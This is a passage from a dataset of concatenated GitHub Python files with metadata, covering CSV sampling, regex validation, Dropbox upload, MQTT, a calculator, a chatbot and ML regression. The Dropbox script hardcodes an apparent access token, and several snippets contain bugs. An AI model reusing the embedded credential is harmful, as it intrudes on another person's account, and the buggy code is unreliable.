数据去重,选取具有代表性的pio_type,原始数据是从数据库中直接拉去下来的数据,同类型的数据出现频率太高\n 这个脚本的作用是清洗数据,选择部分数据作为训练集或者测试集\ndemand: 数据是csv格式的文件,最好在csv文件中已经去重\n\"\"\"\ndef load_data():\n # 设置读取文件路径和存储文件路径\n file_path = \"\"\n result_path = \"\"\n if os.path.exists(file_path) and os.path.exists(result_path):\n print(\"file exist, the process can continue\")\n else:\n print(\"file not exist\")\n return\n raw_file = pd.read_csv(file_path, engine=\"python\")\n result_file = open(result_path, mode='a', newline='')\n\n # 交互性命令行设置,方便设置抽取参数sampel_num\n m, n = raw_file.shape\n result_writer = csv.writer(result_file)\n sampel_num = input(\"how many data do you want extract from the origin file :\")\n if sampel_num == None:\n print(\"we set a default number for you, number is 10000\")\n sampel_num = 10000\n sampel_num = int(sampel_num)\n if sampel_num >= m:\n print(\"invalid number\")\n keyIn = input(\"make sure you have define how many data do you want, continue(yes/no?)\")\n if keyIn != \"yes\":\n return\n print(\"the process start working\")\n \n # 核心代码,进行数据数据\n begin_time = time.clock()\n print(0, raw_file.loc[0][1])\n print(1, raw_file.loc[1][1])\n for i in range(m):\n # k = raw_file.loc[i][1]\n # print(k, type(k))\n # 注意这里raw_file.loc[i][1]的type是str类型,只比较字符串的第一个字符来判断是否选取这个样本\n if i >= sampel_num:\n break\n if i == 0 or raw_file.loc[i][1][0] != raw_file.loc[i-1][1][0]:\n # print(raw_file.loc[i][1])\n kk = raw_file.loc[i][1]\n print(kk)\n result_writer.writerow([kk])\n print(\"data storing...\")\n result_file.close()\n end_time = time.clock()\n print(\"time consuming of the process:\", end_time-begin_time, \"s\")\n\ndef main():\n load_data()\n\nif __name__ == \"__main__\":\n main()","repo_name":"dddfgkl/csvAndExcel","sub_path":"csvAnalyse/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39581575050","text":"# Regex без использования Google Search (Hors Arev :D)\nimport re\npattern = '^([0-9a-zA-Z_\\.-]+)\\@([0-9a-zA-Z_\\.-]+)\\.([ru | com | io | net | ai]{2,6})$'\nstring = 'example@mail.ru'\npattern2 = '^([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})$'\nstring2 = '2001:0DB8:AC10:FE01'\nresult = re.findall(pattern, string)\nresult2 = re.findall(pattern2, string2)\nif len(result) > 0:\n\tif len(result[0]) == 3:\n\t\tprint('Valid E-mail :)')\n\telse:\n\t\tprint('No Valid E-mail :)')\nelse:\n\tprint('No Valid E-mail :)')\nif len(result2) > 0:\n\tif len(result2[0]) == 4:\n\t\tprint('Valid IPV6 :)')\n\telse:\n\t\tprint('No Valid IPV6 :)')\nelse:\n\tprint('No Valid IPV6 :)')","repo_name":"wizardcapone/Basic-IT-Center-Python","sub_path":"Regex/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45587018713","text":"from typing import Optional\nfrom core.db import Transactional\nfrom sqlalchemy import select, and_\n\nfrom core.db import session\nfrom core.utils import LanguageManager\nfrom ..models import ProductTax\nclass ProductTaxService:\n def __init__(self):\n ...\n\n @Transactional()\n async def create_product_tax(\n self,\n product_id: int,\n tax_id: int,\n tax: float,\n tax_type: str,\n ) -> str:\n pass\n \n async def delete(\n self,\n ids: list,\n flag: str,\n accept_language: Optional[str],\n language_manager: LanguageManager,\n ) -> dict:\n print (\"~~~~~~~~~~~~~~~~~~~~~~~ product taxes delete request\")\n result = await session.execute(\n select(ProductTax).where(ProductTax.product_id.in_(ids))\n )\n product_taxes = result.scalars().all()\n if not product_taxes:\n print (\"Product taxes not found\")\n else:\n for product_tax in product_taxes:\n await session.delete(product_tax)\n if flag!=\"direct\":\n await session.commit()\n print (\"product taxes delete success\")\n return { \"success\": True, \"message\": language_manager.get_message(accept_language=accept_language, key=\"product_taxes_deleted\") }","repo_name":"techguru0/easyric-api-beta","sub_path":"app/product_tax/services/product_tax.py","file_name":"product_tax.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21816704671","text":"import dropbox\r\n\r\nclass TransferData:\r\n def __init__(self, access_token):\r\n self.access_token = access_token\r\n \r\n def upload_file(self, file_from, file_to):\r\n \r\n dbx = dropbox.Dropbox(self.access_token)\r\n f = open(file_from, 'rb')\r\n print(f.read())\r\n\r\n dbx.files_upload(f.read(), file_to)\r\n\r\ndef main():\r\n access_token = 'sl.AwiGhdO02RNNjBWV_7XBYnfLPrYQYjk-VWmvgWv_rWplLZfEVTfrFm_5Z5XYpb9mw37j19wJjeXgHUVPVQRi-4tOm43ZyC-lSxw6SbCGjKy3mbzQMwG4No3nY331OCZvEj7c5Ww'\r\n transferData = TransferData(access_token)\r\n\r\n file_from = input(\"Enter the file path to transfer: \")\r\n file_to = input(\"Enter the full path to upload to dropbox: \")\r\n transferData.upload_file(file_from, file_to)\r\n\r\nmain()","repo_name":"WhiteHatJr-stud/cloudStorageErrorCode","sub_path":"cloudStorage.py","file_name":"cloudStorage.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73463530924","text":"# 임의의 N개 숫자가 입력으로 주어집니다. N개의 수를 오름찾순으로 정렬한 다음 N개의 수중\n# 한 개의 수인 M이 주어지면 이분검색으로 M이 정렬된 상태에서 몇 번째에 있는지 구하는 프로그램을 작성하세요\n\nimport sys\n# sys.stdin = open(\"in1.txt\", \"rt\")\nn, k = map(int, input().split())\n\n\nlist1 = list(map(int, input().split()))\n\n# print(list1)\nlist1.sort()\n# print(list1)\n\n\n\nlt = 0\nrt = n\nwhile lt <= rt:\n mid = (rt + lt) // 2\n if list1[mid] == k:\n print(mid+1)\n break;\n elif list1[mid] > k:\n rt = mid - 1\n else:\n lt = mid + 1","repo_name":"genizara/python_algorithm","sub_path":"inflearn01/섹션 4/1. 이분검색/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39065686757","text":"#Functions can Accept Arguments\n#Put the argument's name between the parentheses.\ndef search4vowels(word):\n \"\"\"Display any vowels found in an asked-for word.\"\"\"\n vowels = set('aeiou')\n #This line isn't needed anymore.\n #word = input('Provide a word to search for vowels: ')\n#The call to the \"input\" function is gone(as we don't need that line of code anymore).\n\n found = vowels.intersection(set(word))\n for vowel in found:\n print(vowel)\n\nsearch4vowels('amitpratapsingh')\n","repo_name":"AmitAps/python","sub_path":"headfirstpy/ch4/functakearg.py","file_name":"functakearg.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30131080496","text":"from django.urls import path\nfrom .views import index, sith_page, recruit_page, questions_page, siths, make_hand_of_shadow, hand_amount, more_than_one_hand\n\nurlpatterns = [\n path('', index, name='index'),\n path('sith', siths, name='sith'),\n path('recruit', recruit_page, name='recruit'),\n path('questions/', questions_page, name='questions'),\n path('sith/', sith_page, name='sith_page'),\n path('make_hand_of_shadow//', make_hand_of_shadow, name='make_hand_of_shadow'),\n path('hand_amount', hand_amount, name='hand_amount'),\n path('more_than_one_hand', more_than_one_hand, name='more_than_one_hand'),\n]\n","repo_name":"rishat11/star_wars","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71801312684","text":"import os\nimport time\nimport uuid\nimport datetime\nimport json\nfrom pprint import pprint\nimport paho.mqtt.client as mqtt\n\ndef msg_rcv(client, userdata, message):\n # print(\"Received message '\" + str(message.payload) + \"' on topic '\" + message.topic)\n try:\n data = json.loads(str(message.payload))\n print(data[\"date\"])\n except:\n print(\"A message not intended for me, ignoring... \"+ str(message.payload))\n\ndef on_log(client, userdata, level, buf):\n print(\"log: \",buf)\n\ndef main_loop():\n # mosquitto_sub -h 82.165.16.151 -t UCC/mark\n client = mqtt.Client(\"bje_client_\"+ str(uuid.UUID.hex))\n client.on_message = msg_rcv\n # client.on_log = on_log\n client.connect(\"test.mosquitto.org\") # , port=1883 , keepalive=60, bind_address=\"\"\n client.loop_start()\n client.subscribe(\"test_for_anna\")\n\n while True:\n time.sleep(1)\n print(\".\")\n\nif __name__ == \"__main__\":\n main_loop()","repo_name":"kittylyst/helloku-world","sub_path":"rcv.py","file_name":"rcv.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26776819969","text":"import os\n\n# a little helper function for getting all dettected marker ids\n# from the reference image markers\ndef which(x, values):\n indices = []\n for ii in list(values):\n if ii in x:\n indices.append(list(x).index(ii))\n return indices\n\n\ndef get_camera_path(camera_name):\n\n stream = os.popen('v4l2-ctl --list-devices')\n output = stream.read()\n lines = output.split(\"\\n\")\n for i, line in enumerate(lines):\n if camera_name in line:\n return lines[i+1].strip()\n \n return \"\"","repo_name":"vietanhdev/paper_stream","sub_path":"libs/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"73437640364","text":"import tkinter as tk\n\ndef calculate():\n num1 = float(entry_num1.get())\n num2 = float(entry_num2.get())\n operation = operation_var.get()\n \n if operation == \"Add\":\n result.set(num1 + num2)\n elif operation == \"Subtract\":\n result.set(num1 - num2)\n elif operation == \"Multiply\":\n result.set(num1 * num2)\n elif operation == \"Divide\":\n if num2 == 0:\n result.set(\"Cannot divide by zero\")\n else:\n result.set(num1 / num2)\n else:\n result.set(\"Please select a operation\")\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"Calculator\")\n\n# Create input fields and labels\nentry_num1 = tk.Entry(root)\nentry_num2 = tk.Entry(root)\nresult = tk.StringVar()\noperation_var = tk.StringVar()\noperation_var.set(\"Select Operation\")\n\nlabel_num1 = tk.Label(root, text=\"Enter first number:\")\nlabel_num2 = tk.Label(root, text=\"Enter second number:\")\nlabel_result = tk.Label(root, text=\"Result:\")\nlabel_operation = tk.Label(root, text=\"Select operation:\")\n\n# Create operation options\noperation_options = [\"Add\", \"Subtract\", \"Multiply\", \"Divide\"]\noption_menu = tk.OptionMenu(root, operation_var, *operation_options)\n\n# Create calculate button\ncalculate_button = tk.Button(root, text=\"Calculate\", command=calculate)\n\n# Grid layout\nlabel_num1.grid(row=0, column=0)\nentry_num1.grid(row=0, column=1)\nlabel_num2.grid(row=1, column=0)\nentry_num2.grid(row=1, column=1)\nlabel_operation.grid(row=2, column=0)\noption_menu.grid(row=2, column=1)\ncalculate_button.grid(row=3, column=0, columnspan=2)\nlabel_result.grid(row=4, column=0)\ntk.Label(root, textvariable=result).grid(row=4, column=1)\n\n# Start the GUI event loop\nroot.mainloop()\n","repo_name":"deepa-48/Calculator","sub_path":"simple_calculator.py","file_name":"simple_calculator.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41366390049","text":"# -*- coding:utf8 -*-\n\nimport os\nimport time\nimport json\nimport argparse\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\n\nfrom utils import check_ping, parse_ip, check_port\n\n\nclass HostScanner(object):\n\n def __init__(self, args):\n self.m = args.m\n self.f = args.f\n self.file_name = args.w\n self.cost_print = args.v\n self.concurrent_num = args.n\n self.ip = [ip for ip in parse_ip(args.ip)] if args.f == 'ping' else args.ip\n\n def run_ping(self, ip):\n res = check_ping(ip)\n return {'ip': ip, 'can_ping': res}\n\n def run_tcp_port(self, port):\n res = check_port(self.ip, port)\n return {'ip': self.ip, 'port': port, 'is_open': res}\n\n def run(self):\n begin = int(time.time())\n Executer = ThreadPoolExecutor if args.m == 'thread' else ProcessPoolExecutor\n with Executer(self.concurrent_num) as pool:\n if self.f == 'ping':\n result = pool.map(self.run_ping, self.ip)\n else:\n result = pool.map(self.run_tcp_port, [port for port in range(65535 + 1)])\n end = int(time.time())\n\n if self.cost_print:\n print('cost time:%s' % (end - begin))\n data = list()\n for d in result:\n data.append(d)\n\n if self.file_name:\n with open(self.file_name, 'w') as f:\n f.write(json.dumps(data))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', type=str, choices=['proc', 'thread'], default='proc', help='多线程or多进程')\n parser.add_argument('-n', type=int, help='进程或线程数量')\n parser.add_argument('-f', choices=['tcp', 'ping'], default='ping', help='执行方式')\n parser.add_argument('-ip', metavar='ip', required=True, help='ip eg. 192.0.0.1 192.0.0.1-192.0.0.100')\n parser.add_argument('-w', metavar='filename', help='扫描结果保存文件')\n parser.add_argument('-v', action='store_true', help='打印扫描器运行耗时')\n args = parser.parse_args()\n host_scanner = HostScanner(args)\n host_scanner.run()\n","repo_name":"Masonnn/ApiTest","sub_path":"pythonYing/week03/homework/pmap02/app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16108182961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 23 12:38:13 2016\n\n@author: apple\n\"\"\"\nimport numpy as np\nimport time\nfrom numba import jit, f8, njit\nimport C_bisect as Cbi\n\ndef root_func(x,aa,kk):\n return x**4 + kk*x**2 + aa*x - 3\n \na = np.random.rand(50000)\nkk = np.random.randint(-2,50,size=a.shape).astype(np.float64)\nres = np.empty(a.size)\nres1 = np.empty(a.size)\nres2 = np.empty(a.size)\n\n\n# [0] python bisection\nt1 = time.time()\ndef python_bisect(a, b, aa, kk, tol, mxiter):\n its = 0\n fa = root_func(a, aa, kk)\n fb = root_func(b, aa, kk)\n if abs(fa) < tol:\n return a\n elif abs(fb) < tol:\n return b\n c = (a+b)/2.\n fc = root_func(c, aa, kk)\n while abs(fc)>tol and itstol and its 0.75:\n for intent in intents['intents']:\n if tag == intent[\"tag\"]:\n print(f\"{bot_name}: {(random.choice(intent['responses']))}\")\n else:\n print(f\"{bot_name}: Não entendi...\")","repo_name":"GO0108/sabia","sub_path":"Criando um ChatBot/Chatbot BoW/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"6038197722","text":"import urllib.parse\nfrom typing import Callable\n\nimport web_framework.server_side.infastructure.ids_manager as ids_manager\nfrom APIs.TalpiotAPIs.Gitlab.gitlab_file_tree import GitlabFileTree\nfrom web_framework.server_side.infastructure.constants import *\nfrom web_framework.server_side.infastructure.ui_component import UIComponent\n\n\nclass FileTree(UIComponent):\n def __init__(self, action: Callable = None, size=SIZE_MEDIUM, start_folder = 'bot_features', branch = 'development'):\n super().__init__(size=size)\n self.__action = None\n self.set_action(action)\n self.__files = GitlabFileTree.objects(name=start_folder, branch = branch).first()\n self.__files = self.__files.to_json() if self.__files is not None else {}\n\n def set_action(self, action: Callable):\n if action:\n func_id = ids_manager.gen_action_id(lambda json: action(json['url']))\n self.__action = self.method_to_url(func_id)\n\n def render(self):\n return {\n JSON_TYPE: 'FileTree',\n JSON_ID: self.id,\n JSON_ACTION: self.__action,\n JSON_SIZE: self.size,\n JSON_FILES: self.__files\n }\n","repo_name":"roeinath/Magdad","sub_path":"web_framework/server_side/infastructure/components/file_tree.py","file_name":"file_tree.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72614305964","text":"#2244. Minimum Rounds to Complete All Tasks\ndef minimumRounds(self, tasks: list[int]) -> int:\n tasks.sort()\n fin = 0\n for i in range(0,len(tasks)):\n for j in range(i+1,len(tasks)):\n if tasks[j] != tasks[i]:\n break\n n = j-i-1\n print(n,tasks[i],tasks[j])\n if n%3 == 0:\n fin += n/3\n elif n > 2:\n fin += fun(n)\n elif n == 2:\n fin += 1\n elif n < 2 :\n return -1\n return fin\n\n\"\"\" amount = []\n fin = 0\n for i in r:\n amount.append(tasks.count(i))\n print(amount)\n for l in amount:\n if l < 2:\n return -1\n elif l%3 == 0:\n fin += l/3\n elif l > 2:\n fin += fun(l)\n elif l == 2:\n fin += 1\n return int(fin)\n\"\"\"\ndef fun(n):\n numb = int(n/3)\n for i in range(numb,-1,-1):\n if (n-i*3) %2 == 0:\n return i + (n-i*3)/2\n\n\n \n\nprint(minimumRounds(5,[2,2,3,3,2,4,4,4,4,4]))","repo_name":"leonado10000/CP","sub_path":"leetcode/2244. Minimum Rounds to Complete All Tas.py","file_name":"2244. Minimum Rounds to Complete All Tas.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3268277726","text":"from tensorflow import keras\nfrom tensorflow.keras import backend as K\n\n__all__ = ['WeightedSum']\n\n\nclass WeightedSum(keras.layers.Layer):\n r\"\"\"Sum the layers with trainable weights. All the layers should have the same shape and mask.\n\n h = \\gamma * \\sum_{i=0}^L w_i h_i\n\n s will be normalized with softmax.\n \"\"\"\n\n def __init__(self,\n use_scaling=True,\n **kwargs):\n \"\"\"Initialize the layer.\n\n :param use_scaling: Whether to use the scaling term `gamma`.\n :param kwargs:\n \"\"\"\n self.supports_masking = True\n self.use_scaling = use_scaling\n self.gamma, self.w = None, None\n super(WeightedSum, self).__init__(**kwargs)\n\n def get_config(self):\n config = {\n 'use_scaling': self.use_scaling,\n }\n base_config = super(WeightedSum, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def build(self, input_shape):\n if isinstance(input_shape, list):\n layer_num = len(input_shape)\n else:\n layer_num = 1\n if self.use_scaling:\n self.gamma = self.add_weight(shape=(1,),\n initializer='ones',\n name='%s_gamma' % self.name)\n self.w = self.add_weight(shape=(layer_num,),\n initializer='ones',\n name='%s_w' % self.name)\n super(WeightedSum, self).build(input_shape)\n\n def compute_output_shape(self, input_shape):\n if isinstance(input_shape, list):\n return input_shape[0]\n return input_shape\n\n def compute_mask(self, inputs, mask=None):\n if isinstance(mask, list):\n return mask[0]\n return mask\n\n def call(self, inputs, mask=None, **kwargs):\n e = K.exp(self.w - K.max(self.w))\n w = e / (K.sum(e) + K.epsilon())\n if not isinstance(inputs, list):\n inputs = [inputs]\n summed = w[0] * inputs[0]\n for i in range(1, len(inputs)):\n summed += w[i] * inputs[i]\n if self.use_scaling:\n summed *= self.gamma\n return summed\n","repo_name":"CyberZHG/keras-bi-lm","sub_path":"keras_bi_lm/weighted_sum.py","file_name":"weighted_sum.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"72661126123","text":"import os, time, math\nimport random\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom .data_factory import DataFactory\nfrom .log_factory import LogFactory\nfrom .Normalizer import UnitGaussianNormalizer\nfrom .models.nnet_model import MyNNet\nfrom .utils import *\nfrom .bayes_optimization import Bayes_Optimization\nfrom sklearn.metrics import r2_score\nfrom sklearn.linear_model import LassoCV\nfrom bayes_opt import BayesianOptimization\n\nimport matplotlib.pyplot as plt\n\n\nclass CoreComponent:\n def __init__(self, model='lasso', imputer='knn', outlier='zscore', pca='pca', device='cuda'):\n self.root_path = os.path.abspath(os.curdir)\n self.data_path = os.path.join(self.root_path, 'data')\n print(\"The root path of our project: \", self.root_path)\n self.imputer = imputer\n self.outlier = outlier\n self.pca = pca\n self.device = device # choose with your preference\n\n self.model_name = 'lasso' if model is None else model # choose with your preference\n if self.model_name == 'lasso':\n self.train_model = LassoCV\n elif self.model_name == 'nnet':\n self.train_model = MyNNet(self)\n elif self.model_name == 'ridge':\n from sklearn.linear_model import RidgeCV\n self.train_model = RidgeCV\n else:\n self.train_model = None\n\n self.log_factory = LogFactory(self, log_to_disk=False)\n self.data_factory = DataFactory(self)\n self.full_normalizer = UnitGaussianNormalizer(self)\n self.y_normalizer = UnitGaussianNormalizer(self)\n self.bayes_optimization = Bayes_Optimization(self)\n\n self.full_X = None\n self.full_Y = None\n self.validation_X = None\n\n self.k_fold = 10\n self.train_percent = 0.99\n\n self.initialized = False\n\n def initialization(self):\n random.seed(0)\n self.log_factory.initialization()\n self.log_factory.InfoLog(sentences=\"Log Factory fully created\")\n\n self.data_factory.initialization()\n\n # 1. read data\n self.full_X = self.data_factory.read_dataset(os.path.join(self.data_path, \"X_train.csv\"))\n self.full_Y = self.data_factory.read_dataset(os.path.join(self.data_path, \"y_train.csv\"))\n self.validation_X = self.data_factory.read_dataset(os.path.join(self.data_path, \"X_test.csv\"))\n\n # 2. process X files together\n full_X_shape_0 = self.full_X.shape[0]\n validation_X_shape_0 = self.validation_X.shape[0]\n full_validation_X = np.concatenate((self.full_X, self.validation_X), axis=0)\n\n full_validation_X, self.full_Y = self.data_factory.process_dataset(full_validation_X, self.full_Y,\n impute_method=self.imputer,\n outlier_method=self.outlier)\n self.full_normalizer.initialization(full_validation_X)\n full_validation_X = self.full_normalizer.encode(full_validation_X)\n full_X_shape_0 = len(self.full_Y)\n full_validation_X, self.full_Y = self.data_factory.feature_selection(full_validation_X, self.full_Y,\n method=self.pca, rows_X=full_X_shape_0)\n self.log_factory.InfoLog(\"After feature selection, the shape of X = {}\".format(full_validation_X.shape))\n self.full_X = full_validation_X[:full_X_shape_0, :]\n self.validation_X = full_validation_X[-validation_X_shape_0:, :]\n\n # self.y_normalizer.initialization(self.full_Y)\n # self.full_Y = self.y_normalizer.encode(self.full_Y)\n\n # 3. transfer numpy data to Tensor data\n self.log_factory.InfoLog(\"Read data completed from X_train.csv, with shape as {}\".format(self.full_X.shape))\n self.full_X = torch.autograd.Variable(torch.from_numpy(np.array(self.full_X)).float()).to(self.device)\n # self.full_Y = self.data_factory.process_dataset(self.full_Y) # Y data cannot be processed!\n self.log_factory.InfoLog(\"Read data completed from y_train.csv, with shape as {}\".format(self.full_Y.shape))\n self.full_Y = torch.autograd.Variable(\n torch.from_numpy(np.array(self.full_Y).reshape(self.full_Y.shape[0], 1)).float()).to(self.device)\n\n self.log_factory.InfoLog(\n \"Read data completed from X_test.csv, with shape as {}\".format(self.validation_X.shape))\n self.validation_X = torch.autograd.Variable(torch.from_numpy(np.array(self.validation_X)).float()).to(\n self.device)\n\n self.initialized = True\n \n\n def run(self):\n if self.model_name == \"lasso\":\n full_X = self.full_X.cpu().numpy()\n full_Y = self.full_Y.cpu().numpy()\n reg = self.train_model(n_alphas=100, cv=self.k_fold, eps=1e-3, max_iter=5000, random_state=0,\n precompute=False).fit(full_X, full_Y)\n predicted_y_validate = reg.predict(self.validation_X.cpu().numpy())\n predicted_y_full = reg.predict(full_X)\n self.dump_validated_y(predicted_y_validate)\n self.log_factory.InfoLog(\"all score = {}\".format(r2_score(full_Y, predicted_y_full)))\n elif self.model_name == 'ridge':\n full_X = self.full_X.cpu().numpy()\n full_Y = self.full_Y.cpu().numpy()\n \"\"\"\n params: cv=k-fold //为None时使用loocv来验证,但是score会用mse而不是r2score\n alphas=[...] //里面是我们备选的所有正则化参数\n fit_intercept=True //default就是True,指在拟合时是否需要截距(当然需要)\n \"\"\"\n reg = self.train_model(alphas=[1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 10.0], cv=self.k_fold).fit(full_X, full_Y)\n predicted_y_validate = reg.predict(self.validation_X.cpu().numpy())\n predicted_y_full = reg.predict(full_X)\n self.dump_validated_y(predicted_y_validate.squeeze(1))\n self.log_factory.InfoLog(\"all score = {}\".format(r2_score(full_Y, predicted_y_full)))\n elif self.model_name == \"mlp\":\n from sklearn.ensemble import ExtraTreesRegressor\n from sklearn.model_selection import RandomizedSearchCV, GridSearchCV, cross_val_score\n #from sklearn.neural_network import MLPRegressor\n\n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n\n ###贝叶斯调参 \n #黑盒函数 \n def black_box_function(n_estimators, min_samples_split, max_features, max_depth, min_samples_leaf):\n val = cross_val_score(\n ExtraTreesRegressor(n_estimators = int(n_estimators),\n max_features = int(max_features),\n max_depth = int(max_depth),\n min_samples_split = int(min_samples_split),\n min_samples_leaf = int(min_samples_leaf),\n random_state = 2,\n bootstrap=True\n ),\n train_X, train_Y,scoring='r2', cv=5, n_jobs=-1\n ).mean()\n return val #max_features = max_features, # float\n \n #定义域\n pbounds= {'n_estimators': (500, 2000),\n 'max_features': (1, self.full_X.shape[1]),\n 'max_depth': (5, 150),\n 'min_samples_split': (2, 30),\n 'min_samples_leaf':(1, 20)}\n #'bootstrap': [True, False]\n #实例化对象\n optimizer = BayesianOptimization(f= black_box_function,\n pbounds= pbounds,\n verbose= 2, # verbose = 1 prints only when a maximum is observed, verbose = 0 is silent\n random_state= 1,\n )\n #确定迭代次数\n optimizer.maximize(init_points= 12, #执行随机搜索的步数\n n_iter= 100, #执行贝叶斯优化的步数\n )\n #输出最优结果\n print(optimizer.max)\n n_es=optimizer.max['params']['n_estimators']\n max_dep=optimizer.max['params']['max_depth']\n max_fea=optimizer.max['params']['max_features']\n min_s_l=optimizer.max['params']['min_samples_leaf']\n min_s_s=optimizer.max['params']['min_samples_split']\n \n # extra trees regression\n extra_tree = ExtraTreesRegressor(n_estimators=int(n_es),max_depth=int(max_dep), max_features=int(max_fea),\n min_samples_leaf=int(min_s_l), min_samples_split=int(min_s_s), n_jobs=-1,bootstrap=True)\n extra_tree.fit(train_X, train_Y)\n extra_pred = extra_tree.predict(val_X)\n\n self.log_factory.InfoLog(\"The score of extra_tree for validation={}\".format(r2_score(val_Y, extra_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': extra_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(extra_tree.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"adaboost\":\n from sklearn import ensemble \n from sklearn.tree import DecisionTreeRegressor \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n print('Bayes_Optimization(adaboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_Adaboost(train_X = train_X, train_Y = train_Y) \n Adaboost = ensemble.AdaBoostRegressor(\n DecisionTreeRegressor( max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s,min_samples_leaf = min_s_l, random_state = 2),\n n_estimators = n_es,learning_rate = l_ra)\n \n Adaboost.fit(train_X, train_Y)\n ada_pred = Adaboost.predict(val_X)\n\n self.log_factory.InfoLog(\"The score of Adaboost for validation={}\".format(r2_score(val_Y, ada_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': ada_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(Adaboost.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"Gboost\":\n from sklearn import ensemble \n model_GradientBoostingRegressor = ensemble.GradientBoostingRegressor()\n \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n #Gboost\n print('Bayes_Optimization(Gboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s = self.bayes_optimization.Bayes_opt_GBoost(train_X = train_X, train_Y = train_Y) \n Gboost = ensemble.GradientBoostingRegressor(max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, random_state = 2,\n n_estimators = n_es, learning_rate = l_ra, loss='huber')\n\n Gboost.fit(train_X, train_Y)\n gbt_pred = Gboost.predict(val_X)\n \n self.log_factory.InfoLog(\"The score of Adaboost for validation={}\".format(r2_score(val_Y, gbt_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': gbt_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(Gboost.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"ensemble\":\n from sklearn.model_selection import KFold, GridSearchCV\n \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n 